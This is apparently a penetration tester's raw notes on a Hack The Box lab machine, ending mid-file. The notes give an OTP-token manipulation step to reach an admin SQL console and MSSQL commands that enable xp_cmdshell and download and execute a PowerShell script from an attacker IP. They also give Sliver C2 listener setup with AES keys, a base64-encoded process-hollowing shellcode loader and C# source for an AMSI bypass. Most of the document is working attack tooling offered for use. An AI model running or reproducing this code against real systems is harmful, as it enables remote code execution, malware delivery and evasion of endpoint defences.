10.10.14.221 my ip
10.10.11.5 machine ip
http://freelancer.htb/accounts/login/otp/Mg==/b92264a30d0ed8d3fb034cc68ba312d0/
http://freelancer.htb/accounts/login/otp/MTAwMTE=
I had to change the opt toke to Mg== to get admin on webpage from qr code.
the i did directory enumeration and found a page /admin. which had sql terminal
| dbo | SQL_USER |
| guest | SQL_USER |
| INFORMATION_SCHEMA | SQL_USER |
| sys | SQL_USER |
| Freelancer_webapp_us |
The following query is used to get the rev shell.
Check zero point for some manual enumeration.
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'Show Advanced Options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.32/amsi64.txt'' -UseBasicParsing | iex"';
REVERT;
Listener
https -L 10.10.14.221 -l 443
Setup for Powershell payload
profiles new -b https://10.10.XX.XXX:443 --skip-symbols --format shellcode --arch amd64 sliver64_htb
Stage Listener for msfvenom Payload
stage-listener --url https://10.10.14.221:8445 --profile osep_64 --prepend-size
Stage Listener for C# payload
stage-listener --url https://10.10.XX.XXX:8446 --profile sliver64_htb -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
Generating C# shellcoder runner
sliverphollow64.txt
vim sliverphollow64.txt
$encodeStr = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCAAdf57gAAAAAAAAAAPAAIiALAjAAAB4AAAAEAAAAAAAAAAAAAAAgAAAAAACAAQAAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABgAAAAAgAAAAAAAAMAYIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABAAACYAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcDsAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAABIAAAAAAAAAAAAAAAudGV4dAAAABgcAAAAIAAAAB4AAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACYAwAAAEAAAAAEAAAAIAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAgAFABQkAABcFwAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATMAoAFwEAAAEAABEoEQAACn4+AAAEJS0XJn49AAAE/gYQAAAGcxIAAAolgD4AAAQoEwAACnQfAAABKBQAAApzDQAABgJvFQAACgpzFgAACgsFLDQOBCwwHxATCysQBwYRC5FvFwAAChELF1gTCxELBo5pF1kx5wdvGAAACgUOBCgHAAAGDCsCBgwIBCgGAAAGDQMTBAmOaRMFcwsAAAYTBhEGFn02AAAEcgEAAHARBCgZAAAKFBQUFxp+GgAAChQRBhIHKAEAAAYmEQd7CAAABCUWcxsAAAoRBX4EAAAEfgMAAAQoAgAABhMIFhMJEgoJjmkoGwAACiURCAkRChEJKAMAAAYmFnMbAAAKFhEIFnMbAAAKFhZzGwAACigEAAAGJioAGzACALkAAAACAAARFAoDcisAAHAoHAAACixHcx0AAAoLAnMeAAAKDAgWcx8AAAoNCQdvIAAACt4UCSwGCW8hAAAK3AgsBghvIQAACtwHbyIAAAoK3goHLAYHbyEAAArcBioDcj0AAHAoHAAACixUcx0AAAoTBAJzHgAAChMFEQUWcyMAAAoTBhEGEQRvIAAACt4YEQYsBxEGbyEAAArcEQUsBxEFbyEAAArcEQRvIgAACgreDBEELAcRBG8hAAAK3AYqAioAAAABTAAAAgAkAAktAAoAAAAAAgAcABs3AAoAAAAAAgAVADVKAAoAAAAAAgB8AAuHAAwAAAAAAgByACGTAAwAAAAAAgBqAD+pAAwAAAAAGzAEAIEAAAADAAARAwoECygkAAAKDAgGbyUAAAoIB28mAAAKCBdvJwAACggIbygAAAoIbykAAApvKgAACg0Ccx4AAAoTBBEECRdzKwAAChMFEQUCFgKOaW8sAAAKEQRvIgAAChMG3iIRBSwHEQVvIQAACtwRBCwHEQRvIQAACtwILAYIbyEAAArcEQYqAAAAASgAAAIARQAXXAAMAAAAAAIAOgAuaAAMAAAAAAIACgBqdAAKAAAAAB4CKC0AAAoqSh9AgAMAAAQgABAAAIAEAAAEKnoCfhoAAAp9BgAABAIoLQAACgICKAEAACt9BQAABCoAABMwAgBgAAAAAAAAAAJ+GgAACn0sAAAEAn4aAAAKfS0AAAQCfhoAAAp9LgAABAJ+GgAACn05AAAEAn4aAAAKfToAAAQCfhoAAAp9OwAABAJ+GgAACn08AAAEAigtAAAKAgIoAgAAK30rAAAEKk4CAygvAAAKJSCA8PoCbzAAAAoqHgIoMQAACioucw8AAAaAPQAABCoeAigtAAAKKgoXKgBCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAD4BwAAI34AAGQIAACoCwAAI1N0cmluZ3MAAAAADBQAAEgAAAAjVVMAVBQAABAAAAAjR1VJRAAAAGQUAAD4AgAAI0Jsb2IAAAAAAAAAAgAAAVcdAhwJCgAAAPoBMwAWAAABAAAALQAAAAgAAAA+AAAAEAAAACoAAAAxAAAAHgAAABAAAAADAAAAAQAAAAEAAAAEAAAAAQAAAAIAAAAGAAAAAgAAAAAAOQcBAAAAAAAGAL0FGAkGACoGGAkGANIE4ggPADgJAAAGAPoELggGAJEFLggGAHIFLggGABEGLggGAN0FLggGAPYFLggGABEFLggGAOYE+QgGAMQE+QgGAFUFLggGACwFkQYGAHAKlwcGACcAdQMGAIIHdwEKAFwHAwgKAHcHAwgGAPUINQsGAMYHNQsGAGoHNQsGAFQElwcGAK4FlwcGANcHlwcKAIwKgQoKAK8KgQoKALkGlwcGAKkEGAkKAL0GkQsGAHcEVwkKAPMHVwkKAAYKkQsKAH8IgQoGAJoElwcGAKsGlwcGANsIlwcGAIgHdwEKAPkDAwgGAAkElwcGAJ4HNQsGANwDNQsGAOgDNQsGADEH+QgAAAAAWAAAAAAAAQABAAEAEACPB2QIQQABAAEACgAQAKwJAABBAAUACgAKARAAGwgAAGEACAALAAIBAADPCQAAaQAMAAsACgAQAEkIAABBACsACwACABAAxgoAAG0APQAMAAMhEABxAwAAQQA9AA4AEQAeC5QBEQDuApQBEQDkAJcBEQCOApcBBgCyBpoBBgC2CG0ABgAVBJ0BBgAmCm0ABgDFA20ABgCmA5oBBgCbA5oBBgZLA5cBVoBoAqABVoB2AqABVoCKAKABVoA+AqABVoDRAKABVoAoAqABVoDGAaABVoDyAaABVoDaAaABVoCBAaABVoC2AqABVoBBAaABVoArAaABVoC2AaABVoAiAqABVoAGAqABVoAXA6ABVoAvA6ABVoBPAqABVoDRAqABVoBZAaABVoCbAKABVoBwAKABVoAKAaABVoC3AKABVoACA6ABVoCaAaABVoD7AKABVoCnAaABVoCZAqABBgBlA5oBBgDRA20ABgBaCG0ABgAkBG0ABgATA5oBBgBHA5oBBgBbBpoBBgBjBpoBBgDqCZoBBgD4CZoBBgBFBZoBBgDiCZoBBgD7CqQBBgA8AKQBBgBIAG0ABgDbCm0ABgDlCm0ABgCfCG0ANgBUAKcBFgABAKsBAAAAAIAAliBhAK8BAQAAAAAAgACWIAcLwwELAAAAAACAAJYgXwvMARAAAAAAAIAAkSCyA9YBFQBIIAAAAACWAEgG4QEcAGwhAAAAAJYAXgrsASEAgCIAAAAAlgCkCvQBIwA4IwAAAACGGKkIBgAmAEAjAAAAAJEYrwj/ASYAUyMAAAAAhhipCAYAJgB0IwAAAACGGKkIBgAmAOAjAAAAAMQArAruACYA9CMAAAAAhhipCAYAJwD8IwAAAACRGK8I/wEnAAgkAAAAAIYYqQgGACcAECQAAAAAgwALAAMCJwAAAAEALAQAAAIAPgQAAAMAmAkAAAQAhQkAAAUARwkAAAYAvwkAAAcAlgoAAAgAcgsBAAkARwgCAAoAGQgAAAEAJgoAAAIAPQoAAAMAdwYAAAQAXgQAAAUAdwoAAAEAJgoAAAIALwoAAAMAeAgAAAQAdwYAAAUA3AcAAAEAJgoAAAIAhQkAAAMAawYAAAQARwoAAAUAkwgAAAYAvwkAAAcAkAMAAAEAWAcAAAIAUgsAAAMAsQcAAAQAHgsAAAUA7gIAAAEAYAMAAAIAsQcAAAEA8AoAAAIAHgsAAAMA7gIAAAEAVgoAAAEAcQgAAAIAhwQAAAMA/QcAAAQAFgoJAKkIAQARAKkIBgAZAKkICgApAKkIEAAxAKkIEAA5AKkIEABBAKkIEABJAKkIEABRAKkIEABZAKkIEABhAKkIFQBpAKkIEABxAKkIEAB5AKkIEADJAKkIBgDxAKkIBgAZAeEGMgD5AKkINwAhAUwEPQAZAQkHSQDZAFMDTwAMAKkIBgAMAM0DWwAMABYLYQApAWkKZwAxAVUIbQAxAakIAQApAYULgQCRAKkIBgCRAKkIhwCZAKkIjQA5AUAIlwBJAW8EBgCRABYLngChAKkIjQCpAJMEtABRAS0LhwBRAfsChwBRAYUGuQBRASULngBRAfQCngBRAcsIwAC5AKkIyQA5AaME1QCBAKkIBgBpAX4G3QDZAKwK7gDhALoKAQDZAKkIBgAJADQA/gAJADgAAwEJADwACAEJAEAADQEJAEQAEgEJAEgAFwEJAEwAHAEJAFAAIQEJAFQAJgEJAFgAKwEJAFwAMAEJAGAANQEJAGQAOgEJAGgAPwEJAGwARAEJAHAASQEJAHQATgEJAHgAUwEJAHwAWAEJAIAAXQEJAIQAYgEJAIgAZwEJAIwAbAEJAJAAcQEJAJQAdgEJAJgAewEJAJwAgAEJAKAAhQEJAKQAigEJAKgAjwEuAAsAEQIuABMAGgIuABsAOQIuACMAQgIuACsAVQIuADMAVQIuADsAVQIuAEMAQgIuAEsAWwIuAFMAVQIuAFsAVQIuAGMAcwIuAGsAnQIuAHMAqgKjAHsA/gADAYMA/gAaAHAAowBLB1UAAAEDAGEAAQAAAQUABwsBAAABBwBfCwEAAAEJALIDAQAEgAAAAQAAAAAAAAAAAAAAAAAuAAAABAAAAAAAAAAAAAAA9QBoAwAAAAAEAAAAAAAAAAAAAAD1AJcHAAAAAAMAAgAEAAIABQACAAYAAgAHAAIACAACAF0A5ABdAOkAAAAAPD45X18xMl8wADxEb3dubG9hZEFuZEV4ZWN1dGU+Yl9fMTJfMABMaXN0YDEAQ2xhc3NMaWJyYXJ5MQBjYlJlc2VydmVkMgBscFJlc2VydmVkMgA8PjkAPE1vZHVsZT4AQ3JlYXRlUHJvY2Vzc0EAQ1JFQVRFX0JSRUFLQVdBWV9GUk9NX0pPQgBDUkVBVEVfU1VTUEVOREVEAFBST0NFU1NfTU9ERV9CQUNLR1JPVU5EX0VORABDUkVBVEVfREVGQVVMVF9FUlJPUl9NT0RFAENSRUFURV9ORVdfQ09OU09MRQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBTeXN0ZW0uSU8AQ1JFQVRFX05FV19QUk9DRVNTX0dST1VQAFBST0ZJTEVfVVNFUgBQUk9GSUxFX1NFUlZFUgBDUkVBVEVfRk9SQ0VET1MASURMRV9QUklPUklUWV9DTEFTUwBSRUFMVElNRV9QUklPUklUWV9DTEFTUwBISUdIX1BSSU9SSVRZX0NMQVNTAEFCT1ZFX05PUk1BTF9QUklPUklUWV9DTEFTUwBCRUxPV19OT1JNQUxfUFJJT1JJVFlfQ0xBU1MAREVUQUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJPQ0VTUwBNRU1fQ09NTUlUAENSRUFURV9JR05PUkVfU1lTVEVNX0RFRkFVTFQAQ1JFQVRFX1VOSUNPREVfRU5WSVJPTk1FTlQARVhURU5ERURfU1RBUlRVUElORk9fUFJFU0VOVABBRVNJVgBnZXRfSVYAc2V0X0lWAENSRUFURV9OT19XSU5ET1cAZHdYAElOSEVSSVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAERvd25sb2FkRGF0YQBkYXRhAGNiAG1zY29ybGliADw+YwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBscFRocmVhZElkAGR3VGhyZWFkSWQAZHdQcm9jZXNzSWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAQWRkAGxwUmVzZXJ2ZWQAUGFkZGluZ01vZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUASURpc3Bvc2FibGUAYkluaGVyaXRIYW5kbGUAbHBUaXRsZQBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAENvbWJpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBYNTA5Q2VydGlmaWNhdGUAY2VydGlmaWNhdGUAQ3JlYXRlAERlbGVnYXRlAFdyaXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBEb3dubG9hZEFuZEV4ZWN1dGUAZHdYU2l6ZQBkd1lTaXplAGR3U3RhY2tTaXplAGR3U2l6ZQBTaXplT2YAc2V0X1BhZGRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTdHJpbmcATGVuZ3RoAFVyaQBSZW1vdGVDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBnZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sAc2V0X1NlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrAE1hcnNoYWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAHVybABEZWZsYXRlU3RyZWFtAENyeXB0b1N0cmVhbQBHWmlwU3RyZWFtAE1lbW9yeVN0cmVhbQBQcm9ncmFtAFN5c3RlbQBTeW1tZXRyaWNBbGdvcml0aG0AQ29tcHJlc3Npb25BbGdvcml0aG0ASUNyeXB0b1RyYW5zZm9ybQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AWDUwOUNoYWluAGNoYWluAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBDb3B5VG8AbHBTdGFydHVwSW5mbwBaZXJvAGxwRGVza3RvcABTbDF2ZXJMb2FkZXIAc2VuZGVyAGJ1ZmZlcgBTZXJ2aWNlUG9pbnRNYW5hZ2VyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgAuY2N0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAQWVzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAU3NsUG9saWN5RXJyb3JzAHNzbFBvbGljeUVycm9y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"
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://10.10.14.221:8446/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
amsi64.txt
vim amsi64.txt
$HWBP = @"
using System;
using System.Collections.Generic;
using System.Linq.Expressions;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HWBP
{
public class Amsi
{
static string a = "msi";
static string b = "anB";
static string c = "ff";
static IntPtr BaseAddress = WinAPI.LoadLibrary("a" + a + ".dll");
static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, "A" + a + "Sc" + b + "u" + c + "er");
static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));
public static void Bypass()
{
WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();
ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;
MethodInfo method = typeof(Amsi).GetMethod("Handler", BindingFlags.Static | BindingFlags.Public);
IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());
Marshal.StructureToPtr(ctx, pCtx, true);
bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);
ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));
EnableBreakpoint(ctx, pABuF, 0);
WinAPI.SetThreadContext((IntPtr)(-2), pCtx);
}
public static long Handler(IntPtr exceptions)
{
WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();
ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));
WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();
ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));
WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();
ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));
if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)
{
ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);
IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean
Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);
ContextRecord.Rip = ReturnAddress;
ContextRecord.Rsp += 8;
ContextRecord.Rax = 0; // S_OK
Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT
return WinAPI.EXCEPTION_CONTINUE_EXECUTION;
}
else
{
return WinAPI.EXCEPTION_CONTINUE_SEARCH;
}
}
public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)
{
switch (index)
{
case 0:
ctx.Dr0 = (ulong)address.ToInt64();
break;
case 1:
ctx.Dr1 = (ulong)address.ToInt64();
break;
case 2:
ctx.Dr2 = (ulong)address.ToInt64();
break;
case 3:
ctx.Dr3 = (ulong)address.ToInt64();
break;
}
ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);
ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);
ctx.Dr6 = 0;
Marshal.StructureToPtr(ctx, pCtx, true);
}
public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)
{
ulong mask = (1UL << bits) - 1UL;
dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
return dw;
}
}
public class WinAPI
{
public const UInt32 DBG_CONTINUE = 0x00010002;
public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;
public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;
public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;
public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;
public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;
public const Int32 EXCEPTION_DEBUG_EVENT = 1;
public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;
